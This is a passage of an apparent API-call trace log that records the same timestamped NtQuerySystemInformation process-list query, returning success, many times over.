SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe308) returned 0x0 [0243.613] 